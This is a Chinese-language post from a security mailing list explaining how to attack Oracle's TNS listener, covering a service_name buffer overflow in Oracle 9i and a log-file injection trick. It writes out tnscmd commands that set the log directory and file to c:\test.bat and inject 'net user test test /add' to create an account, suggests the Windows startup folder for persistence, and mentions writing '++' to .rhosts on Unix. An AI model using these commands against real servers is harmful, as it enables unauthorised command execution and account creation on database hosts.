Author:poison/amxku
首先,根据版本的不同,TNS listener <http://www.amxku.net/tag/listener/>
可能较易受到多种类型的缓冲区溢出
<http://www.amxku.net/tag/%25E6%2594%25BB%25E5%2587%25BB/> 攻击,这些
<http://www.amxku.net/tag/%25E6%2594%25BB%25E5%2587%25BB/> 攻击可以在不提供
用户ID和口令的情况下被利用。例如:在oracle
<http://www.amxku.net/tag/oracle/> 9i中,当客户机请求某个过长的service_name
时,很容易受到溢出 <http://www.amxku.net/tag/%25E6%2594%25BB%25E5%2587%25BB/>
攻击。当listener <http://www.amxku.net/tag/listener/> 为日志构建错误消息之
后,service_name的值会被复制到某于栈结构的缓冲区内,从而引起溢出--覆盖保存值
将返回栈中的地址。这种做法可以使
<http://www.amxku.net/tag/%25E6%2594%25BB%25E5%2587%25BB/> 攻击者获得控制
权。事实上,TNS listener <http://www.amxku.net/tag/listener/> 曾经有过多次溢
出和格式化字符串的漏洞。
其次,另一类 <http://www.amxku.net/tag/%25E6%2594%25BB%25E5%2587%25BB/>
攻击和日志文件有关。只有当未给listener <http://www.amxku.net/tag/listener/>
设置口令的时候,攻击才会有效。假设某个listener
<http://www.amxku.net/tag/listener/> 没有设置口令,攻击方法如下: tnscmd -h
www.example.com -p 1521 --rawcmd
"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_direc
tory)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=c:\\)))" 将日志目
录设置到C盘 tnscmd -h www.example.com -p 1521 --rawcmd
"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=log_file)
(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=1)(VALUE=test.bat)))" 将日志文件
设置为test.bat tnscmd -h www.example.com --rawcmd "(CONNECT_DATA=((
||dir >test.txt||net user test test /add))" 该命令把dir >test.txt、net
user test test /add命令写入c:\test.bat文件,由于双竖线的作用(第一条命令执行
失败后,WINDOWS命令解释器执行后面的命令)把错误的信息注释掉, 从而可以执行我
们提交的命令。
通过设置日志文件到不同的目录,例如WINDOWS的启动目录,当服务器重启将执行
恶意用户提交的特定代码,从而对系统造成威胁。
运行于UNIX系统上的oracle <http://www.amxku.net/tag/oracle/> 也会受到同样
的威胁。其中一种方法就是将"++"回送给.rhost文件,当系统运行时,使用
r*services命令。
Address: http://www.amxku.net/archives/oracle-tns-listener/
[Ph4nt0m] <http://www.ph4nt0m.org/>
[Ph4nt0m Security Team]
<http://blog.ph4nt0m.org/> [EMAIL PROTECTED]
Email: [EMAIL PROTECTED]
PingMe:
<http://cn.pingme.messenger.yahoo.com/webchat/ajax_webchat.php?yid=hanqin_wu
hq&sig=9ae1bbb1ae99009d8859e88e899ab2d1c2a17724>
=== V3ry G00d, V3ry Str0ng ===
=== Ultim4te H4cking ===
=== XPLOITZ ! ===
=== #_# ===
#If you brave,there is nothing you cannot achieve.#
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---
<<inline: image001.gif>>

